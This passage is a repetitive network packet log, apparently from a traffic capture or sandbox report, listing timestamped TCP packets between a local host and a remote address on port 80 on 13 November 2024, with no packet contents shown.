                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598413944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598439932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598453999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598457098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598474026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598488092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598503113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598519087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598534107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598534107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598550081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598556042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598567009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598588943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598596096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598612070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598625898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598640919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598654985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598664045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598671913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598686934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598701000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598716021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598731041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598735094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598735094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598758936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598767042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598783970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598798990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598814964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598829985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598833084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598846912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598855972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598864079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598897934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598910093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598925114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598941088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598947048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598958015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598972082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598973989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.598989964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599004984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599025965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599030018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599045038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599046946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599066019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599090099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599102974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599104881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599127054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599140882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599154949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599169970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599189997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599194050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599208117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599208117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599226952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599241972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599242926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599261045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599276066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599291086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599291086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599303961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599308968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599328995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599338055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599347115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599361897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599379063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599387884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599395037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599411011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599423885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599426985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599442959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599443913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599459887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599474907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599488020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599490881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599505901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599507093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599524975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599541903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599545956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599555969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599572897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599663973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599678993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599694014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599708080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599736929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599749088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599765062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599797964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599814892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599829912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599845886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599864960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599884987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599900961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599915981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599920034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599960089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599977970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.599994898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600008965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600023985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600035906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600038052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600054026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600106001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600131989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600147009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600155115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600178957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600202084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600217104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600233078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600235939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600246906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600289106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600342035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600357056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600372076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600385904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600388050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600405931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600408077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600429058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600444078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600451946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600460052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.600490093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637521029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637533903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637548923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637577057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637584925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637593985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637600899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637644053 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637825966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637851954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637867928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637881994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637907982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637913942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637924910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637938023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637943029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637953043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637959003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.637974977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.638008118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640470028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640485048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640501022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640527010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640530109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640542984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640558004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640562057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640574932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640578032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640594006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640645027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640659094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640675068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640691042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640696049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640707016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640726089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640741110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640742064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640758038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640768051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640775919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640790939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640794039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640810966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640826941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640845060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640856028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640870094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640872002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640887022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640902996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640916109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.640933037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671215057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671226978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671242952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671257973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671263933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671273947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671289921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671305895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671307087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671327114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671372890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671387911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671402931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671427011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671458006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671576023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671591997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671607018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671628952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671737909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671753883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671768904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671782970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671796083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671797037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671813011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671822071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671829939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671839952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671844006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671861887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671861887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671878099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671904087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.671988010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672003984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672015905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672029972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672038078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672046900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672049999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672063112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.672081947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677503109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677520990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677536011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677551031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677577972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677776098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677788973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.677829027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698024988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698040962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698057890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698074102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698087931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698093891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698118925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698124886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698137999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698158979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698158979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698205948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698870897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698888063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698904037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698951006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698976040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.698991060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699007034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699023008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699023962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699038982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699219942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.699265957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705548048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705574989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705589056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705604076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705626965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705631018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705647945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705656052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705665112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705688000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705765963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705780983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705796003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705811024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.705811024 CET4973380192.168.2.442.96.10.8
